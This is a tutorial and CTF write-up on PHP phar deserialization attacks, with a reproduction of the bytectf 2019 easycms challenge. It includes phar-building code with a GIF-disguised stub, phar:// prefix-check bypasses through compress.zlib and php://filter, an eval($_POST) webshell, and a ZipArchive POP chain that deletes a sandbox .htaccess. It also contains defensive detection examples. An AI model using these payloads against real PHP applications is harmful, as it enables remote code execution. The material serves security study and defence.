0x01 Reference Links
To give credit where it is due, most of the content below comes from the reference link:
link
0x02 Principle
A phar is essentially an archive. Each contained file's permissions, attributes and other information are stored in the manifest, and the manifest also stores user-defined meta-data as a serialized PHP object. That serialized meta-data is the core of the attack described below.
PHP ships a Phar class for building and handling phar files, so we can construct a phar with the file structure we want.
Note: the phar.readonly option in php.ini must be set to Off, otherwise phar files cannot be generated.
```php
<?php
class TestObject {
    // magic methods go here (they run when a file function deserializes the phar's meta-data)
}
$phar = new Phar("phar.phar"); // the extension must be .phar
$phar->startBuffering();
$phar->setStub('GIF89a' . '<?php __HALT_COMPILER(); ?>'); // set the stub; the GIF header bypasses image-format checks
$o = new TestObject();
$o->data = 'hu3sky';
$phar->setMetadata($o); // store the custom meta-data in the manifest
$phar->addFromString("test.txt", "test"); // add a file to the archive
// the signature is computed automatically
$phar->stopBuffering();
?>
```
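As an added example (not code from the original post), here is how an upload handler can tell the GIF89a-stubbed phar built above from a real image: the image magic bytes match in both cases, but the phar format requires the `__HALT_COMPILER();` token in its stub, so that token is the reliable indicator. The function names and the sample byte strings are constructed for this example.

```php
<?php
// Added example, not from the original post: upload-side detection of a phar
// archive disguised as an image. A phar's stub must contain the token
// __HALT_COMPILER();, so its presence after the magic bytes is a reliable
// indicator regardless of the file extension or a MIME sniff.

// Magic-byte check used by many upload handlers: passes the GIF89a stub above.
function has_gif_magic(string $bytes): bool
{
    return strncmp($bytes, 'GIF89a', 6) === 0 || strncmp($bytes, 'GIF87a', 6) === 0;
}

// Phar indicator: the stub terminator is mandatory in the phar format, and
// PHP tokens are case-insensitive, so compare case-insensitively.
function looks_like_phar(string $bytes): bool
{
    return stripos($bytes, '__halt_compiler') !== false;
}

// Decide whether to store the upload: image magic alone is not enough.
function accept_image_upload(string $bytes): bool
{
    return has_gif_magic($bytes) && !looks_like_phar($bytes);
}

// Constructed samples: a minimal GIF header, and polyglots built like the
// setStub('GIF89a' . '<?php __HALT_COMPILER(); ?>') archive above.
$samples = [
    'plain gif'      => "GIF89a\x01\x00\x01\x00\x80\x00\x00",
    'phar polyglot'  => "GIF89a<?php __HALT_COMPILER(); ?>\r\n" . str_repeat("\x00", 16),
    'lowercase stub' => "GIF89a<?php __halt_compiler(); ?>\r\n",
];
foreach ($samples as $label => $bytes) {
    printf("%-15s magic=%-3s phar=%-3s accept=%s\n", $label,
        has_gif_magic($bytes) ? 'yes' : 'no',
        looks_like_phar($bytes) ? 'yes' : 'no',
        accept_image_upload($bytes) ? 'yes' : 'no');
}
```

Re-encoding the image with GD before storing it is stronger still, since the re-encoded output contains only pixel data and discards any embedded stub or manifest.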
The following functions also trigger phar file deserialization when given a phar:// path (additional functions found beyond the usual file operations):
- exif: exif_thumbnail, exif_imagetype
- gd: imageloadfont, imagecreatefrom***
- hash: hash_hmac_file, hash_file, hash_update_file, md5_file, sha1_file
- file / url: get_meta_tags, get_headers
- standard: getimagesize, getimagesizefromstring
- fileinfo: finfo_file / finfo_buffer / mime_content_type
- zip:
```php
$zip = new ZipArchive();
$res = $zip->open('c.zip'); // after compressing the phar, rename the archive to .gif; it can still be extracted
$zip->extractTo('phar://test.phar/test');
```
- mysqli: LOAD DATA LOCAL INFILE
LOAD DATA LOCAL INFILE also goes through php_stream_open_wrapper, so it triggers the deserialization as well. Let's test it:
```php
<?php
// test class: __wakeup() runs when the phar meta-data is deserialized
class A {
    public $s = '';
    public function __wakeup () {
        system($this->s);
    }
}
$m = mysqli_init();
mysqli_options($m, MYSQLI_OPT_LOCAL_INFILE, true);
$s = mysqli_real_connect($m, 'localhost', 'root', '123456', 'easyweb', 3306);
// the phar:// path is opened client-side through php_stream_open_wrapper
$p = mysqli_query($m, 'LOAD DATA LOCAL INFILE \'phar://test.phar/test\' INTO TABLE a LINES TERMINATED BY \'\r\n\' IGNORE 1 LINES;');
```
mysqld also has to be reconfigured:
```ini
[mysqld]
local-infile=1
secure_file_priv=""
```
Bypassing a check on the phar:// prefix
0x01 Wrap phar:// inside another stream wrapper:
```php
$z = 'compress.bzip2://phar:///home/sx/test.phar/test.txt';
$z = 'compress.zlib://phar:///home/sx/test.phar/test.txt';
@file_get_contents($z);
```
0x02 Reach the phar through php://filter:
```php
@include('php://filter/read=convert.base64-encode/resource=phar://yunying.phar');
mime_content_type('php://filter/read=convert.base64-encode/resource=phar://yunying.phar');
```
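As an added example (not code from the original post), here is why a check on the literal `phar://` prefix fails against the wrappers shown above, beside a resolver that never lets any stream wrapper reach a file function. The function names, the temp-directory demo and the probe strings are assumptions of this example.

```php
<?php
// Added example, not from the original post: a naive prefix check versus a
// hardened resolver for user-controlled file names passed to file functions.

// Defence in depth: an app that never reads phar archives can drop the
// wrapper, so no file function can ever parse a phar manifest.
stream_wrapper_unregister('phar');

// Weak check seen in many apps: only inspects the literal prefix, so
// compress.zlib://phar://... and php://filter/...resource=phar://... pass.
function naive_is_safe(string $path): bool
{
    return stripos($path, 'phar://') !== 0;
}

// Hardened: accept only a bare file name (no ':', no separators, no "..")
// that resolves to a regular file inside $baseDir; returns the real path or
// null. Rejecting ':' blocks every stream wrapper (phar://, compress.*://,
// php://filter, data:) without maintaining a denylist of scheme names.
function resolve_upload(string $baseDir, string $name): ?string
{
    if ($name === '' || preg_match('~[:/\\\\]|\.\.~', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    // realpath() followed symlinks; make sure we are still inside $base.
    return strpos($real, $base . DIRECTORY_SEPARATOR) === 0 ? $real : null;
}

// Constructed demo: one legitimate upload plus the wrapper probes from this post.
$dir = sys_get_temp_dir() . '/phar_demo_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents("$dir/avatar.gif", 'GIF89a');
$probes = [
    'avatar.gif',
    'phar://uploads/avatar.gif/test.txt',
    'compress.zlib://phar://uploads/avatar.gif/test.txt',
    'php://filter/read=convert.base64-encode/resource=phar://avatar.gif',
];
foreach ($probes as $p) {
    printf("%-68s naive=%-5s hardened=%s\n", $p,
        naive_is_safe($p) ? 'pass' : 'block',
        resolve_upload($dir, $p) === null ? 'block' : 'pass');
}
unlink("$dir/avatar.gif"); rmdir($dir);
```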
0x03 Reproducing bytectf_2019_easycms
Get the source from www.zip.
- index.php: the login page; any account can log in.
- upload.php: the upload page, but only the admin account can upload files. Visiting upload.php generates a sandbox directory containing an .htaccess file that reads: lolololol, i control all
- After a file is uploaded, its storage path is returned. "view details" leads to view.php, which echoes the file's mime type and file path.
- Because the directory's .htaccess contains that text, it cannot be parsed, so accessing an uploaded file returns a 500.
0x01 Hash length extension attack (hashpump.py)
Objects are instantiated from the Admin class. Following the Admin class confirms a hash length extension attack; the specific method is not covered here, a quick search will do.
0x02 Constructing the phar pop chain
We know the upload folder contains an .htaccess, so an uploaded PHP webshell cannot be parsed; we need a way to delete the .htaccess.
Trying to upload an image webshell shows that there is a filter.
There are two attack ideas:
- use phar deserialization to move the uploaded file to another directory, bypassing the sandbox's .htaccess
- first upload a PHP webshell, then delete the .htaccess file via phar deserialization
Because we do not know the directory where temporary files are stored, only the second approach is usable.
In view.php there is a File class; follow the File class.
As mentioned above, mime_content_type can trigger phar deserialization.
We also note that the Profile class has a magic method __call, which calls an open function, and that admin, username and password are controllable. So we have to find classes with an open method (ZipArchive, SessionHandler).
ZipArchive is the one that can be used:
`ZipArchive::open(string $filename [, int $flags]): mixed`
With the ZipArchive::OVERWRITE flag, this method can directly delete the .htaccess file.
Note that open can also be pointed at a non-archive file, such as .htaccess.
First upload a webshell:
```php
<?php
$a = "sys"."tem";
eval($_POST["xxx"]);
?>
```
Then construct the `phar pop` attack chain:
```php
<?php
class File{
    public $filename;
    public $filepath;
    public $checker;
}
class Profile{
    public $username;
    public $password;
    public $admin;
}
$a = new File();
$a->checker = new Profile();
$a->checker->admin = new ZipArchive();
$a->checker->username = "/var/www/html/sandbox/fd40c7f4125a9b9ff1a4e75d293e3080/.htaccess";
$a->checker->password = ZipArchive::OVERWRITE;
$phar = new Phar('phar.phar');
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER();?>');
$phar->addFromString('test.txt', 'test');
$phar->setMetadata($a);
$phar->stopBuffering();
?>
```
Ugh, the uploaded phar was filtered with the prompt `you scares me`. In winhex I saw a ``, but deleting it might damage the phar structure and stop it working. Switching to php 7.0 to generate the phar let it upload completely and solved the problem. We have to keep up with the times. I gave myself a good beating over that one.
Use php://filter to bypass the WAF's detection and trigger the phar deserialization:
`view.php?filename=9c7f4a2fbf2dd3dfb7051727a644d99f.phar&filepath=php://filter/resource=phar://sandbox/fd40c7f4125a9b9ff1a4e75d293e3080/9c7f4a2fbf2dd3dfb7051727a644d99f.phar`
.htaccess was successfully deleted.